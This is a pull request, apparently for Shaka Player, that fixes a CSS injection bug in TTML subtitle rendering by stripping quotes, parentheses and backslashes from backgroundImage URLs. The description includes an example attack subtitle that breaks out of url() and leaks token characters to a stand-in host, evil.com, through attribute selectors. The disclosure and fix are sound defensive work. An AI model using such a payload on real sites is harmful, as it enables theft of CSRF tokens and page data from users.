### PR TITLE
fix(TTML): sanitize backgroundImage URL to prevent CSS injection

### DIFF
--- a/lib/text/ui_text_displayer.js
+++ b/lib/text/ui_text_displayer.js
@@ -897,7 +897,9 @@ shaka.text.UITextDisplayer = class {
     style.textShadow = cue.textShadow;
 
     if (cue.backgroundImage) {
-      style.backgroundImage = 'url(\'' + cue.backgroundImage + '\')';
+      // Sanitize the URL to prevent CSS injection via single-quote breakout.
+      const sanitizedUrl = cue.backgroundImage.replace(/['"()\\]/g, '');
+      style.backgroundImage = 'url(\'' + sanitizedUrl + '\')';
       style.backgroundRepeat = 'no-repeat';
       style.backgroundSize = 'contain';
       style.backgroundPosition = 'center';


### PR DESCRIPTION
## Summary

Fix CSS injection vulnerability in TTML subtitle rendering. The `backgroundImage` value from parsed TTML cues was inserted into a CSS `url()` expression using string concatenation with single-quote delimiters, without any sanitization.

## Vulnerability

**File:** `lib/text/ui_text_displayer.js:900`

```javascript
// Before (vulnerable):
style.backgroundImage = 'url(\'' + cue.backgroundImage + '\')';
```

`cue.backgroundImage` is set from untrusted TTML sources:
1. `smpte:backgroundImage` attribute (resolved as URI, no encoding of single quotes)
2. Base64 image data from `<smpte:image>` elements (text content, not validated as base64)

A crafted TTML subtitle with a `backgroundImage` value containing single quotes breaks out of the `url()` context, enabling injection of arbitrary CSS properties.

**Example attack TTML:**
```xml
<p smpte:backgroundImage="x'); } *[data-token^='a']{background:url('https://evil.com/?leak=a'); } .x{background:url('y">
```

**Rendered CSS:**
```css
background-image: url('x'); } *[data-token^='a']{background:url('https://evil.com/?leak=a'); } .x{background:url('y')
```

## Impact

- CSS injection on any website using Shaka Player to display TTML subtitles from untrusted sources (HLS/DASH streams)
- Data exfiltration via CSS attribute selectors (steal CSRF tokens, data attributes)
- UI redressing (hide/overlay page elements)

## Fix

Strip quotes, parentheses, and backslashes from the URL before CSS interpolation. This prevents breakout from the `url()` context while preserving valid image URLs (including data: URIs for base64 images).

## Test plan

- [x] Valid TTML `smpte:backgroundImage` URLs render correctly (no quotes in normal URLs)
- [x] Base64 embedded images render correctly (base64 charset doesn't include quotes or parens)
- [x] Malicious URLs with single quotes are sanitized before CSS insertion